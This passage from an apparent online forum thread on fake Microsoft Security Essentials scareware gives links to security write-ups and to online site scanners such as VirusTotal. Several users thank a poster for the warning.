http://www.f-secure.com/weblog/archives/00002053.html
http://www.pcworld.com/businesscenter/article/208592/beware_fake_microsoft_security_essentials.html
http://blogs.technet.com/b/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx

There are some good online sites which you can use to check if a site is legitimate or infected:

http://www.virustotal.com/ - Online virus scanner/site checker
http://urlquery.net/ - Site Scanner
http://www.unmaskparasites.com/ - Site Scanner
http://zulu.zscaler.com/ - Site scanner/inspector
http://www.avgthreatlabs.com/sitereports/ - Site scanner (part of AVG)

Thanks for the answer.

This whole matter did get me to download the real MSE yesterday. A quick scan shows no problem. Also, Malwarebytes' Anti-Malware shows no problem.

Bravo, kudos & thanks to MoneyBagger for helping FT and rest of us^^^^^

Thank you, MoneyBagger.

Well done. ^

Well done MoneyBagger!! :0) As someone else said IT should have picked up on this ages ago!